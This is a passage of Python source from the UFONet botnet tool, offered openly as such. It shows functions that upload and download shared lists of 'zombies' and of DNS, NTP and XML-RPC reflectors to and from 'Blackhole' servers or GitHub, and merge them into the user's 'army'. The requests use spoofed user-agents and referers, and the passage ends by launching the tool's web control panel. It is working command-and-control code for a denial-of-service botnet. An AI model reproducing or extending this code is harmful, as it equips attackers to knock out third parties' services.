  1919. cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
  1920. cs.connect(host, cport)
  1921. cs.send("SEND " + 'community_dnss.txt.gz')
  1922. cs.close()
  1923. f = open('botnet/community_dnss.txt.gz', "rb")
  1924. data = f.read()
  1925. f.close()
  1926. ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1927. ms.connect(host, mport)
  1928. ms.send(data)
  1929. ms.close()
  1930. os.remove('botnet/community_dnss.txt.gz') # remove local dnss .gz file after transfer
  1931. time.sleep(2) # sleep a bit more
  1932. print('-'*12 + '\n')
  1933. print("[Info] [AI] Transfer -> [DONE!]\n")
  1934. except Exception as e:
  1935. print(str(e) + "\n")
  1936. except:
  1937. print('-'*12 + '\n')
  1938. print("[Error] [AI] Connecting sockets to [Blackhole] -> [Aborting!]\n")
  1939. return
  1940. except:
  1941. print('-'*12 + '\n')
  1942. print("[Error] [AI] Unable to upload list of [Zombies] to this [Blackhole] -> [Exiting!]\n")
  1943. return
  1944. def update_gui_data(self):
  1945. # download all GUI stream data
  1946. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  1947. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  1948. if self.options.proxy: # set proxy
  1949. self.proxy_transport(self.options.proxy)
  1950. if self.options.timeout: # set timeout
  1951. try:
  1952. timeout = int(self.options.timeout)
  1953. except:
  1954. timeout = 5
  1955. else:
  1956. timeout = 5
  1957. if timeout < 1:
  1958. timeout = 5
  1959. if self.options.forcessl:
  1960. news = urllib.request.Request('https://'+self.blackhole+'/ufonet/news.txt', None, headers)
  1961. news_reply = urllib.request.urlopen(news, context=self.ctx, timeout=timeout).read().decode('utf-8')
  1962. missions = urllib.request.Request('https://'+self.blackhole+'/ufonet/missions.txt', None, headers)
  1963. missions_reply = urllib.request.urlopen(missions, context=self.ctx, timeout=timeout).read().decode('utf-8')
  1964. board = urllib.request.Request('https://'+self.blackhole+'/ufonet/board.txt', None, headers)
  1965. board_reply = urllib.request.urlopen(board, context=self.ctx, timeout=timeout).read().decode('utf-8')
  1966. grid = urllib.request.Request('https://'+self.blackhole+'/ufonet/grid.txt', None, headers)
  1967. grid_reply = urllib.request.urlopen(grid, context=self.ctx, timeout=timeout).read().decode('utf-8')
  1968. wargames = urllib.request.Request('https://'+self.blackhole+'/ufonet/wargames.txt', None, headers)
  1969. wargames_reply = urllib.request.urlopen(wargames, context=self.ctx, timeout=timeout).read().decode('utf-8')
  1970. else:
  1971. news = urllib.request.Request('http://'+self.blackhole+'/ufonet/news.txt', None, headers)
  1972. news_reply = urllib.request.urlopen(news, context=self.ctx).read().decode('utf-8')
  1973. missions = urllib.request.Request('http://'+self.blackhole+'/ufonet/missions.txt', None, headers)
  1974. missions_reply = urllib.request.urlopen(missions, context=self.ctx).read().decode('utf-8')
  1975. board = urllib.request.Request('http://'+self.blackhole+'/ufonet/board.txt', None, headers)
  1976. board_reply = urllib.request.urlopen(board, context=self.ctx).read().decode('utf-8')
  1977. grid = urllib.request.Request('http://'+self.blackhole+'/ufonet/grid.txt', None, headers)
  1978. grid_reply = urllib.request.urlopen(grid, context=self.ctx).read().decode('utf-8')
  1979. wargames = urllib.request.Request('http://'+self.blackhole+'/ufonet/wargames.txt', None, headers)
  1980. wargames_reply = urllib.request.urlopen(wargames, context=self.ctx).read().decode('utf-8')
  1981. f = open(self.news_file, 'w')
  1982. f.write(news_reply)
  1983. f.close()
  1984. f = open(self.missions_file, 'w')
  1985. f.write(missions_reply)
  1986. f.close()
  1987. f = open(self.board_file, 'w')
  1988. f.write(board_reply)
  1989. f.close()
  1990. f = open(self.grid_file, 'w')
  1991. f.write(grid_reply)
  1992. f.close()
  1993. f = open(self.wargames_file, 'w')
  1994. f.write(wargames_reply)
  1995. f.close()
  1996. print('-'*25 + "\n")
  1997. print("[Info] [AI] GUI data correctly updated:\n")
  1998. if news_reply:
  1999. print("[Info] [AI] [News] : OK!")
  2000. if missions_reply:
  2001. print("[Info] [AI] [Missions]: OK!")
  2002. if board_reply:
  2003. print("[Info] [AI] [Board] : OK!")
  2004. if grid_reply:
  2005. print("[Info] [AI] [Grid] : OK!")
  2006. if wargames_reply:
  2007. print("[Info] [AI] [Wargames]: OK!")
  2008. print('-'*25)
  2009. print("\n[AI] "+self.exit_msg+"\n")
  2010. def downloading_list(self):
  2011. # add your mirror to protect/share/distribute... [Zombies]
  2012. try:
  2013. print(("[AI] Trying [Blackhole] [Server]: "+self.blackhole+"\n"))
  2014. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  2015. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  2016. if self.options.timeout: # set timeout
  2017. try:
  2018. timeout = int(self.options.timeout)
  2019. except:
  2020. timeout = 5
  2021. else:
  2022. timeout = 5
  2023. if timeout < 1:
  2024. timeout = 5
  2025. if self.options.proxy: # set proxy
  2026. self.proxy_transport(self.options.proxy)
  2027. if self.options.forcessl:
  2028. try:
  2029. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
  2030. abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2031. except:
  2032. abductions_reply = ""
  2033. try:
  2034. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
  2035. troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2036. except:
  2037. troops_reply = ""
  2038. try:
  2039. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
  2040. robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2041. except:
  2042. robots_reply = ""
  2043. try:
  2044. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
  2045. drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2046. except:
  2047. drones_reply = ""
  2048. try:
  2049. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
  2050. reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2051. except:
  2052. reflectors_reply = ""
  2053. try:
  2054. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
  2055. crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2056. except:
  2057. crystals_reply = ""
  2058. try:
  2059. req = urllib.request.Request('https://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
  2060. warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2061. except:
  2062. warps_reply = ""
  2063. else:
  2064. try:
  2065. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
  2066. abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2067. except:
  2068. abductions_reply = ""
  2069. try:
  2070. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
  2071. troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2072. except:
  2073. troops_reply = ""
  2074. try:
  2075. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
  2076. robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2077. except:
  2078. robots_reply = ""
  2079. try:
  2080. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
  2081. drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2082. except:
  2083. drones_reply = ""
  2084. try:
  2085. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
  2086. reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2087. except:
  2088. reflectors_reply = ""
  2089. try:
  2090. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
  2091. crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2092. except:
  2093. crystals_reply = ""
  2094. try:
  2095. req = urllib.request.Request('http://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
  2096. warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
  2097. except:
  2098. warps_reply = ""
  2099. if abductions_reply == "" and troops_reply == "" and robots_reply == "" and drones_reply == "" and reflectors_reply == "" and crystals_reply == "" and warps_reply == "":
  2100. print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
  2101. print('-'*12 + '\n')
  2102. print("[Info] [AI] You can try to download [Zombies] from a different [Blackhole] [Server] (provided by someone!) with:\n\n ex: ufonet --down-from '<IP>'")
  2103. print("\nOr/And from a [Blackhole] [GitHub] with:\n\n ex: ufonet --download-github")
  2104. print('-'*12 + '\n')
  2105. print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
  2106. return
  2107. f = open('botnet/abductions.txt.gz', 'wb')
  2108. f.write(abductions_reply)
  2109. f.close()
  2110. f = open('botnet/troops.txt.gz', 'wb')
  2111. f.write(troops_reply)
  2112. f.close()
  2113. f = open('botnet/robots.txt.gz', 'wb')
  2114. f.write(robots_reply)
  2115. f.close()
  2116. f = open('botnet/drones.txt.gz', 'wb')
  2117. f.write(drones_reply)
  2118. f.close()
  2119. f = open('botnet/reflectors.txt.gz', 'wb')
  2120. f.write(reflectors_reply)
  2121. f.close()
  2122. f = open('botnet/crystals.txt.gz', 'wb')
  2123. f.write(crystals_reply)
  2124. f.close()
  2125. f = open('botnet/warps.txt.gz', 'wb')
  2126. f.write(warps_reply)
  2127. f.close()
  2128. print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX READY!] ;-)")
  2129. except:
  2130. print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
  2131. print('-'*12 + '\n')
  2132. print("[Info] [AI] You can try to download [Zombies] from a different [Blackhole] [Server] (provided by someone!) with:\n\n ex: ufonet --down-from '<IP>'")
  2133. print("\nOr/And from a [Blackhole] [GitHub] with:\n\n ex: ufonet --download-github")
  2134. print('-'*12 + '\n')
  2135. print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
  2136. return
  2137. print('-'*12 + '\n')
  2138. f_in_abductions = gzip.open('botnet/abductions.txt.gz', 'rb')
  2139. f_out_abductions = open('botnet/abductions.txt', 'wb')
  2140. f_out_abductions.write(f_in_abductions.read())
  2141. f_in_abductions.close()
  2142. f_out_abductions.close()
  2143. os.remove('botnet/abductions.txt.gz') # remove abductions .gz file
  2144. f_in_troops = gzip.open('botnet/troops.txt.gz', 'rb')
  2145. f_out_troops = open('botnet/troops.txt', 'wb')
  2146. f_out_troops.write(f_in_troops.read())
  2147. f_in_troops.close()
  2148. f_out_troops.close()
  2149. os.remove('botnet/troops.txt.gz') # remove troops .gz file
  2150. f_in_robots = gzip.open('botnet/robots.txt.gz', 'rb')
  2151. f_out_robots = open('botnet/robots.txt', 'wb')
  2152. f_out_robots.write(f_in_robots.read())
  2153. f_in_robots.close()
  2154. f_out_robots.close()
  2155. os.remove('botnet/robots.txt.gz') # remove robots .gz file
  2156. f_in_drones = gzip.open('botnet/drones.txt.gz', 'rb')
  2157. f_out_drones = open('botnet/drones.txt', 'wb')
  2158. f_out_drones.write(f_in_drones.read())
  2159. f_in_drones.close()
  2160. f_out_drones.close()
  2161. os.remove('botnet/drones.txt.gz') # remove drones .gz file
  2162. f_in_reflectors = gzip.open('botnet/reflectors.txt.gz', 'rb')
  2163. f_out_reflectors = open('botnet/reflectors.txt', 'wb')
  2164. f_out_reflectors.write(f_in_reflectors.read())
  2165. f_in_reflectors.close()
  2166. f_out_reflectors.close()
  2167. os.remove('botnet/reflectors.txt.gz') # remove reflectors .gz file
  2168. f_in_crystals = gzip.open('botnet/crystals.txt.gz', 'rb')
  2169. f_out_crystals = open('botnet/crystals.txt', 'wb')
  2170. f_out_crystals.write(f_in_crystals.read())
  2171. f_in_crystals.close()
  2172. f_out_crystals.close()
  2173. os.remove('botnet/crystals.txt.gz') # remove crystals .gz file
  2174. f_in_warps = gzip.open('botnet/warps.txt.gz', 'rb')
  2175. f_out_warps = open('botnet/warps.txt', 'wb')
  2176. f_out_warps.write(f_in_warps.read())
  2177. f_in_warps.close()
  2178. f_out_warps.close()
  2179. os.remove('botnet/warps.txt.gz') # remove warps .gz file
  2180. num_abductions = 0
  2181. with open('botnet/abductions.txt') as f:
  2182. for _ in f:
  2183. num_abductions = num_abductions + 1
  2184. print("[Info] Zombies: " + str(num_abductions))
  2185. num_robots = 0
  2186. with open('botnet/robots.txt') as f:
  2187. for _ in f:
  2188. num_robots = num_robots + 1
  2189. print("[Info] Droids : " + str(num_robots))
  2190. num_troops = 0
  2191. with open('botnet/troops.txt') as f:
  2192. for _ in f:
  2193. num_troops = num_troops + 1
  2194. print("[Info] Aliens : " + str(num_troops))
  2195. num_drones = 0
  2196. with open('botnet/drones.txt') as f:
  2197. for _ in f:
  2198. num_drones = num_drones + 1
  2199. print("[Info] UCAVs : " + str(num_drones))
  2200. num_reflectors = 0
  2201. with open('botnet/reflectors.txt') as f:
  2202. for _ in f:
  2203. num_reflectors = num_reflectors + 1
  2204. print("[Info] X-RPCs : " + str(num_reflectors))
  2205. num_crystals = 0
  2206. with open('botnet/crystals.txt') as f:
  2207. for _ in f:
  2208. num_crystals = num_crystals + 1
  2209. print("[Info] DNSs : " + str(num_crystals))
  2210. num_warps = 0
  2211. with open('botnet/warps.txt') as f:
  2212. for _ in f:
  2213. num_warps = num_warps + 1
  2214. print("[Info] NTPs : " + str(num_warps))
  2215. total_zombies = num_abductions + num_troops + num_crystals + num_robots + num_drones + num_reflectors + num_warps
  2216. print("\n[Info] [AI] Congratulations!. Total downloaded: " + str(total_zombies))
  2217. print('-'*12)
  2218. if not self.options.forceyes:
  2219. update_reply = input("\n[AI] Do you want to merge ONLY the new 'troops' into your army? (Y/n)")
  2220. print('-'*25)
  2221. else:
  2222. update_reply = "Y"
  2223. if update_reply == "n" or update_reply == "N":
  2224. os.remove('botnet/abductions.txt') # remove abductions file
  2225. os.remove('botnet/troops.txt') # remove troops file
  2226. os.remove('botnet/robots.txt') # remove robots file
  2227. os.remove('botnet/drones.txt') # remove drones file
  2228. os.remove('botnet/reflectors.txt') # remove reflectors file
  2229. os.remove('botnet/crystals.txt') # remove crystals file
  2230. os.remove('botnet/warps.txt') # remove warps file
  2231. print("\n[Info] [AI] [Control] Temporal list downloaded has been removed! -> [Exiting!]")
  2232. print('-'*25)
  2233. print("\n[AI] "+self.exit_msg+"\n")
  2234. else:
  2235. zombies_ready = []
  2236. f = open('botnet/abductions.txt')
  2237. abductions = f.readlines()
  2238. f.close()
  2239. fz = open(self.zombies_file)
  2240. zombies = fz.readlines()
  2241. fz.close()
  2242. for abduction in abductions:
  2243. abduction = abduction.replace('\n','')
  2244. if abduction not in zombies:
  2245. zombies_ready.append(abduction)
  2246. else:
  2247. pass
  2248. self.update_zombies(zombies_ready)
  2249. os.remove('botnet/abductions.txt') # remove abductions .txt file
  2250. aliens_ready = []
  2251. f = open('botnet/troops.txt')
  2252. troops = f.readlines()
  2253. f.close()
  2254. fz = open(self.aliens_file)
  2255. aliens = fz.readlines()
  2256. fz.close()
  2257. for alien in troops:
  2258. alien = alien.replace('\n','')
  2259. if alien not in aliens:
  2260. aliens_ready.append(alien)
  2261. else:
  2262. pass
  2263. self.update_aliens(aliens_ready)
  2264. os.remove('botnet/troops.txt') # remove troops .txt file
  2265. droids_ready = []
  2266. f = open('botnet/robots.txt')
  2267. robots = f.readlines()
  2268. f.close()
  2269. fz = open(self.droids_file)
  2270. droids = fz.readlines()
  2271. fz.close()
  2272. for droid in robots:
  2273. droid = droid.replace('\n','')
  2274. if droid not in droids:
  2275. droids_ready.append(droid)
  2276. else:
  2277. pass
  2278. self.update_droids(droids_ready)
  2279. os.remove('botnet/robots.txt') # remove robots .txt file
  2280. ucavs_ready = []
  2281. f = open('botnet/drones.txt')
  2282. drones = f.readlines()
  2283. f.close()
  2284. fz = open(self.ucavs_file)
  2285. ucavs = fz.readlines()
  2286. fz.close()
  2287. for drone in drones:
  2288. drone = drone.replace('\n','')
  2289. if drone not in ucavs:
  2290. ucavs_ready.append(drone)
  2291. else:
  2292. pass
  2293. self.update_ucavs(ucavs_ready)
  2294. os.remove('botnet/drones.txt') # remove drones .txt file
  2295. rpcs_ready = []
  2296. f = open('botnet/reflectors.txt')
  2297. reflectors = f.readlines()
  2298. f.close()
  2299. fz = open(self.rpcs_file)
  2300. rpcs = fz.readlines()
  2301. fz.close()
  2302. for reflector in reflectors:
  2303. reflector = reflector.replace('\n','')
  2304. if reflector not in rpcs:
  2305. rpcs_ready.append(reflector)
  2306. else:
  2307. pass
  2308. self.update_rpcs(rpcs_ready)
  2309. os.remove('botnet/reflectors.txt') # remove reflectors .txt file
  2310. dnss_ready = []
  2311. f = open('botnet/crystals.txt')
  2312. crystals = f.readlines()
  2313. f.close()
  2314. fz = open(self.dnss_file)
  2315. dnss = fz.readlines()
  2316. fz.close()
  2317. for crystal in crystals:
  2318. crystal = crystal.replace('\n','')
  2319. if crystal not in dnss:
  2320. dnss_ready.append(crystal)
  2321. else:
  2322. pass
  2323. self.update_dnss(dnss_ready)
  2324. os.remove('botnet/crystals.txt') # remove crystals .txt file
  2325. ntps_ready = []
  2326. f = open('botnet/warps.txt')
  2327. warps = f.readlines()
  2328. f.close()
  2329. fz = open(self.ntps_file)
  2330. ntps = fz.readlines()
  2331. fz.close()
  2332. for warp in warps:
  2333. warp = warp.replace('\n','')
  2334. if warp not in ntps:
  2335. ntps_ready.append(warp)
  2336. else:
  2337. pass
  2338. self.update_ntps(ntps_ready)
  2339. os.remove('botnet/warps.txt') # remove warps .txt file
  2340. print("\n[Info] [AI] Botnet updated! -> ;-)")
  2341. self.update_transferred_stats(self.trans_zombies) # update json file with transferred stats (blackhole)
  2342. if not self.options.forceyes: # ask for update everything
  2343. print('-'*25 + "\n")
  2344. update_reply = input("[AI] You would also like to update other content: [News] [Grid] [Board]... (Y/n)")
  2345. else:
  2346. update_reply = "Y"
  2347. if update_reply == "n" or update_reply == "N":
  2348. print("\n[AI] "+self.exit_msg+"\n")
  2349. return
  2350. else:
  2351. try:
  2352. update_gui = self.update_gui_data() # update GUI data
  2353. except:
  2354. print('-'*25 +"\n")
  2355. print("[Error] [AI] Something wrong downloading GUI content! -> [Aborting!]")
  2356. print('-'*25)
  2357. print("\n[AI] "+self.exit_msg+"\n")
  2358. return
  2359. def downloading_github_list(self):
  2360. # add your mirror to protect/share/distribute... [Zombies]
  2361. try:
  2362. print(("[AI] Trying [Blackhole] [GitHub]: "+self.github_zombies+"\n"))
  2363. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  2364. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  2365. if self.options.timeout: # set timeout
  2366. try:
  2367. timeout = int(self.options.timeout)
  2368. except:
  2369. timeout = 5
  2370. else:
  2371. timeout = 5
  2372. if timeout < 1:
  2373. timeout = 5
  2374. if self.options.proxy: # set proxy
  2375. self.proxy_transport(self.options.proxy)
  2376. try:
  2377. req = urllib.request.Request(self.github_zombies+'zombies.txt', None, headers)
  2378. zombies_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
  2379. except:
  2380. zombies_reply = ""
  2381. try:
  2382. req = urllib.request.Request(self.github_zombies+'aliens.txt', None, headers)
  2383. aliens_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
  2384. except:
  2385. aliens_reply = ""
  2386. try:
  2387. req = urllib.request.Request(self.github_zombies+'dns.txt', None, headers)
  2388. dns_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
  2389. except:
  2390. dns_reply = ""
  2391. try:
  2392. req = urllib.request.Request(self.github_zombies+'droids.txt', None, headers)
  2393. droids_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
  2394. except:
  2395. droids_reply = ""
  2396. try:
  2397. req = urllib.request.Request(self.github_zombies+'rpcs.txt', None, headers)
  2398. rpcs_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
  2399. except:
  2400. rpcs_reply = ""
  2401. try:
  2402. req = urllib.request.Request(self.github_zombies+'ucavs.txt', None, headers)
  2403. ucavs_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
  2404. except:
  2405. ucavs_reply = ""
  2406. try:
  2407. req = urllib.request.Request(self.github_zombies+'ntp.txt', None, headers)
  2408. ntp_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
  2409. except:
  2410. ntp_reply = ""
  2411. if zombies_reply == "" and aliens_reply == "" and dns_reply == "" and droids_reply == "" and rpcs_reply == "" and ucavs_reply == "" and ntp_reply == "":
  2412. print("[AI] [Control] [Blackhole] [GitHub] Reply: [VORTEX FAILED!]")
  2413. print('-'*12 + '\n')
  2414. print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [GitHub] -> [Exiting!]\n")
  2415. return
  2416. f = open('botnet/abductions.txt', 'w') # zombies
  2417. f.write(zombies_reply)
  2418. f.close()
  2419. f = open('botnet/troops.txt', 'w') # aliens
  2420. f.write(aliens_reply)
  2421. f.close()
  2422. f = open('botnet/crystals.txt', 'w') # dns
  2423. f.write(dns_reply)
  2424. f.close()
  2425. f = open('botnet/robots.txt', 'w') # droids
  2426. f.write(droids_reply)
  2427. f.close()
  2428. f = open('botnet/drones.txt', 'w') # ucavs
  2429. f.write(ucavs_reply)
  2430. f.close()
  2431. f = open('botnet/reflectors.txt', 'w') # rpcs
  2432. f.write(rpcs_reply)
  2433. f.close()
  2434. f = open('botnet/warps.txt', 'w') # ntp
  2435. f.write(ntp_reply)
  2436. f.close()
  2437. print("[AI] [Control] [Blackhole] [GitHub] Reply: [VORTEX READY!] ;-)")
  2438. except:
  2439. print("[AI] [Control] [Blackhole] [GitHub] Reply: [VORTEX FAILED!]")
  2440. print('-'*12 + '\n')
  2441. print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [GitHub] -> [Exiting!]\n")
  2442. return
  2443. print('-'*12 + '\n')
  2444. num_abductions = 0
  2445. with open('botnet/abductions.txt') as f: # zombies
  2446. for _ in f:
  2447. num_abductions = num_abductions + 1
  2448. print("[Info] Zombies: " + str(num_abductions))
  2449. num_troops = 0
  2450. with open('botnet/troops.txt') as f: # aliens
  2451. for _ in f:
  2452. num_troops = num_troops + 1
  2453. print("[Info] Aliens : " + str(num_troops))
  2454. num_robots = 0
  2455. with open('botnet/robots.txt') as f: # droids
  2456. for _ in f:
  2457. num_robots = num_robots + 1
  2458. print("[Info] Droids : " + str(num_robots))
  2459. num_drones = 0
  2460. with open('botnet/drones.txt') as f: # ucavs
  2461. for _ in f:
  2462. num_drones = num_drones + 1
  2463. print("[Info] UCAVs : " + str(num_drones))
  2464. num_reflectors = 0
  2465. with open('botnet/reflectors.txt') as f: # rpcs
  2466. for _ in f:
  2467. num_reflectors = num_reflectors + 1
  2468. print("[Info] X-RPCs : " + str(num_reflectors))
  2469. num_crystals = 0
  2470. with open('botnet/crystals.txt') as f: # dns
  2471. for _ in f:
  2472. num_crystals = num_crystals + 1
  2473. print("[Info] DNSs : " + str(num_crystals))
  2474. num_warps = 0
  2475. with open('botnet/warps.txt') as f: # ntp
  2476. for _ in f:
  2477. num_warps = num_warps + 1
  2478. print("[Info] NTPs : " + str(num_warps))
  2479. total_zombies = num_abductions + num_troops + num_crystals + num_robots + num_drones + num_reflectors + num_warps
  2480. print("\n[Info] [AI] Congratulations!. Total downloaded: " + str(total_zombies))
  2481. print('-'*12)
  2482. if not self.options.forceyes:
  2483. update_reply = input("\n[AI] Do you want to merge ONLY the new 'troops' into your army? (Y/n)")
  2484. print('-'*25)
  2485. else:
  2486. update_reply = "Y"
  2487. if update_reply == "n" or update_reply == "N":
  2488. os.remove('botnet/abductions.txt') # remove zombies/abductions file
  2489. os.remove('botnet/troops.txt') # remove aliens/troops file
  2490. os.remove('botnet/crystals.txt') # remove dns/crystals file
  2491. os.remove('botnet/robots.txt') # remove droids/robots file
  2492. os.remove('botnet/drones.txt') # remove ucavs/drones file
  2493. os.remove('botnet/reflectors.txt') # remove rpcs/reflectors file
  2494. os.remove('botnet/warps.txt') # remove ntp/warps file
  2495. print("\n[Info] [AI] [Control] Temporal list downloaded has been removed! -> [Exiting!]")
  2496. print('-'*25)
  2497. print("\n[AI] "+self.exit_msg+"\n")
  2498. else:
  2499. zombies_ready = []
  2500. f = open('botnet/abductions.txt')
  2501. abductions = f.readlines()
  2502. f.close()
  2503. fz = open(self.zombies_file)
  2504. zombies = fz.readlines()
  2505. fz.close()
  2506. for abduction in abductions:
  2507. abduction = abduction.replace('\n','')
  2508. if abduction not in zombies:
  2509. zombies_ready.append(abduction)
  2510. else:
  2511. pass
  2512. self.update_zombies(zombies_ready)
  2513. os.remove('botnet/abductions.txt') # remove zombies/abductions file
  2514. aliens_ready = []
  2515. f = open('botnet/troops.txt')
  2516. troops = f.readlines()
  2517. f.close()
  2518. fz = open(self.aliens_file)
  2519. aliens = fz.readlines()
  2520. fz.close()
  2521. for alien in troops:
  2522. alien = alien.replace('\n','')
  2523. if alien not in aliens:
  2524. aliens_ready.append(alien)
  2525. else:
  2526. pass
  2527. self.update_aliens(aliens_ready)
  2528. os.remove('botnet/troops.txt') # remove aliens/troops file
  2529. dnss_ready = []
  2530. f = open('botnet/crystals.txt')
  2531. crystals = f.readlines()
  2532. f.close()
  2533. fz = open(self.dnss_file)
  2534. dnss = fz.readlines()
  2535. fz.close()
  2536. for crystal in crystals:
  2537. crystal = crystal.replace('\n','')
  2538. if crystal not in dnss:
  2539. dnss_ready.append(crystal)
  2540. else:
  2541. pass
  2542. self.update_dnss(dnss_ready)
  2543. os.remove('botnet/crystals.txt') # remove dns/crystals file
  2544. droids_ready = []
  2545. f = open('botnet/robots.txt')
  2546. robots = f.readlines()
  2547. f.close()
  2548. fz = open(self.droids_file)
  2549. droids = fz.readlines()
  2550. fz.close()
  2551. for droid in robots:
  2552. droid = droid.replace('\n','')
  2553. if droid not in droids:
  2554. droids_ready.append(droid)
  2555. else:
  2556. pass
  2557. self.update_droids(droids_ready)
  2558. os.remove('botnet/robots.txt') # remove droids/robots file
  2559. ucavs_ready = []
  2560. f = open('botnet/drones.txt')
  2561. drones = f.readlines()
  2562. f.close()
  2563. fz = open(self.ucavs_file)
  2564. ucavs = fz.readlines()
  2565. fz.close()
  2566. for drone in drones:
  2567. drone = drone.replace('\n','')
  2568. if drone not in ucavs:
  2569. ucavs_ready.append(drone)
  2570. else:
  2571. pass
  2572. self.update_ucavs(ucavs_ready)
  2573. os.remove('botnet/drones.txt') # remove UCAVs/drones file
  2574. rpcs_ready = []
  2575. f = open('botnet/reflectors.txt')
  2576. reflectors = f.readlines()
  2577. f.close()
  2578. fz = open(self.rpcs_file)
  2579. rpcs = fz.readlines()
  2580. fz.close()
  2581. for reflector in reflectors:
  2582. reflector = reflector.replace('\n','')
  2583. if reflector not in rpcs:
  2584. rpcs_ready.append(reflector)
  2585. else:
  2586. pass
  2587. self.update_rpcs(rpcs_ready)
  2588. os.remove('botnet/reflectors.txt') # remove RPCs/reflectors file
  2589. ntps_ready = []
  2590. f = open('botnet/warps.txt')
  2591. warps = f.readlines()
  2592. f.close()
  2593. fz = open(self.ntps_file)
  2594. ntps = fz.readlines()
  2595. fz.close()
  2596. for warp in warps:
  2597. warp = warp.replace('\n','')
  2598. if warp not in ntps:
  2599. ntps_ready.append(warp)
  2600. else:
  2601. pass
  2602. self.update_ntps(ntps_ready)
  2603. os.remove('botnet/warps.txt') # remove NTP/warps file
  2604. print("\n[Info] [AI] Botnet updated! -> ;-)")
  2605. self.update_transferred_stats(self.trans_zombies) # update json file with transferred stats (blackhole)
  2606. if not self.options.forceyes: # ask for update everything
  2607. print('-'*25 + "\n")
  2608. update_reply = input("[AI] You would also like to update other content: [News] [Grid] [Board]... (Y/n)")
  2609. else:
  2610. update_reply = "Y"
  2611. if update_reply == "n" or update_reply == "N":
  2612. print("\n[AI] "+self.exit_msg+"\n")
  2613. return
  2614. else:
  2615. try:
  2616. update_gui = self.update_gui_data() # update GUI data
  2617. except:
  2618. print('-'*25 +"\n")
  2619. print("[Error] [AI] Something wrong downloading GUI content! -> [Aborting!]")
  2620. print('-'*25)
  2621. print("\n[AI] "+self.exit_msg+"\n")
  2622. return
  2623. def uploading_github_list(self):
  2624. print(" 0. Set a different URL (if required) for code repository sources:\n\n [current: "+self.github_zombies+"]\n")
  2625. print(" 1. Test your 'zombies' to upload only those that really work (ex: ufonet --test-all).")
  2626. print(" 2. Make a -PULL REQUEST- to the owner of the code repository.")
  2627. print(" 3. Share your updates in the #UFONet 'motherships'...\n")
  2628. print('='*22 + '\n')
  2629. print("[AI] "+self.exit_msg+"\n")
  2630. def create_web_interface(self):
  2631. # launch webserver+gui
  2632. from .webgui import ClientThread
  2633. import webbrowser
  2634. host = '0.0.0.0'
  2635. port = 9999
  2636. try:
  2637. webbrowser.open('http://127.0.0.1:9999', new=1)
  2638. tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  2639. tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  2640. tcpsock.bind((host,port))
  2641. while True:
  2642. tcpsock.listen(4)
  2643. (clientsock, (ip, port)) = tcpsock.accept()
  2644. newthread = ClientThread(ip, port, clientsock)
  2645. newthread.start()
